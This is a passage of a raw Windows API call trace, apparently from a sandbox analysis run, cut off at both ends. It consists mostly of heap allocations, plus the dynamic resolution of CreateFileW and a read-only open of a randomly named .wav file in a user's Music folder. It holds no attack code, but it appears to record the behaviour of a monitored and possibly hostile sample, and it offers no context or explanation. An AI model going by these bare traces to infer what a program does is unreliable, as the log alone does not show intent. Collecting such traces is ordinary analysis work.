lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0112.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0112.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2480 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0112.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0112.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0112.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0112.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0112.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0112.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0112.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0112.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0112.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0112.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0112.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0112.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0112.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0112.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0112.147] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0112.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0112.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0112.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0112.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0112.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0112.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0112.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0112.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0112.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0112.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0112.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0112.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0112.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0112.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0112.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0112.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0112.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0112.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0112.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0112.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0112.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0112.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0112.149] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0112.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0112.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0112.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0112.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0112.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0112.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0112.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0112.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0112.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0112.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0112.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0112.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0112.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0112.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0112.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0112.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0112.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0112.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0112.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0112.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0112.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0112.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0112.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0112.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0112.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.169] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0112.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0112.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0112.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0112.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0112.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca880, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0112.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0112.169] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0112.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0112.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0112.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0112.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0112.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0112.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0112.170] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\dle rck7Umm-.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\dle rck7umm-.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, 